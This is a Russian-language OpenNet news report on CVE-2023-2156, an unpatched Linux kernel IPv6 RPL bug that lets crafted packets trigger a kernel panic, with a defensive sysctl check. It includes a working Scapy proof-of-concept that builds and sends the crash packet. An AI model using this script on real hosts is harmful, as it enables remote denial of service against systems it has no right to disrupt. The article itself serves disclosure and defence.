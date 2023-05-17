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0-day уязвимость IPv6-стеке Linux, позволяющая удалённо вызвать крах ядра

17.05.2023 09:18

Раскрыты сведения о неисправленной (0-day) уязвимости (CVE-2023-2156) в ядре Linux, позволяющей остановить работу системы через отправку специально оформленных пакетов IPv6 (packet-of-death). Проблема проявляется только при включении поддержки протокола RPL (Routing Protocol for Low-Power and Lossy Networks), который в дистрибутивах по умолчанию отключён и применяется, главным образом, на встраиваемых устройствах, работающих в беспроводных сетях с большой потерей пакетов.

Уязвимость вызвана некорректной обработкой внешних данных в коде разбора протокола RPL, которая приводит к срабатыванию assert-сбоя и переходу ядра в состояние panic. При размещении в структуре k_buff (Socket Buffer) данных, полученных в результате разбора заголовка пакета IPv6 RPL, если поле CmprI выставлено в значение 15, поле Segleft в 1, а CmprE в 0, 48-байтный вектор с адресами распаковывается до 528 байт и возникает ситуация, когда выделенной для буфера памяти оказывается недостаточно. В этом случае в функции skb_push, применяемой для помещения данных в структуру, срабатывает проверка на несоразмерность размера данных и буфера, генерирующая состояние panic, чтобы предотвратить запись за границу буфера.

Пример эксплоита: 



   # We'll use Scapy to craft the packet 
   from scapy.all import *
   import socket

   # Use the IPv6 from your LAN interface
   DST_ADDR = sys.argv[1]
   SRC_ADDR = DST_ADDR

   # We use sockets to send the packet
   sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

   # Craft the packet
   #   Type = 3 makes this an RPL packet
   #   Addresses contains 3 addresses, but because CmprI is 15, 
   # each octet of the first two addresses is treated as a compressed address
   #   Segleft = 1 to trigger the amplification
   #   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0

   p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / 
      IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

   # Send this evil packet
   sockfd.sendto(bytes(p), (DST_ADDR, 0))

Примечательно, что разработчики ядра были уведомлены об уязвимости ещё в январе 2022 года и за прошедшие 15 месяцев три раза попытались устранить проблему, выпустив патчи в сентябре 2022 , октябре 2022 и апреле 2023 года, но каждый раз исправлений оказывалось недостаточно и уязвимость удавалось воспроизвести. В конечном счёте проект ZDI, координировавший работу по устранению уязвимости, принял решение раскрыть детальную информацию об уязвимости, не дожидаясь появления работающего исправления в ядре.

Таким образом уязвимость до сих пор остаётся неисправленной. В том числе не эффективен патч, вошедший в ядро 6.4-rc2. Пользователям рекомендуется проверить, что протокол RPL в их системах не используется, что можно сделать при помощи команды 


   sysctl -a | grep -i rpl_seg_enabled


  1. Главная ссылка к новости (https://www.interruptlabs.co.u...)
  2. OpenNews: Удалённая уязвимость в IPv6-стеке OpenBSD
  3. OpenNews: Уязвимости в IPv6-стеке FreeBSD
  4. OpenNews: Удалённые уязвимости в IPv6-стеках OpenBSD и FreeBSD
  5. OpenNews: Уязвимость в ядре Linux, позволяющая вызвать крах через отправку UDP-пакета
  6. OpenNews: Уязвимости в TCP-стеках Linux и FreeBSD, приводящие к удалённому отказу в обслуживании
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/59146-ipv6
Ключевые слова: ipv6, dos, rpl
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Обсуждение (2) RSS
  • 1, Я так сказал (?), 09:42, 17/05/2023 [ответить]  
    		• –1 +/
    дерьмо случается, такова жизнь
    но меня смущает что уж больно много гавнокода в этом донном ядре
     
  • 2, Мне вот любопытно (?), 09:43, 17/05/2023 Скрыто модератором
    		• +/
     

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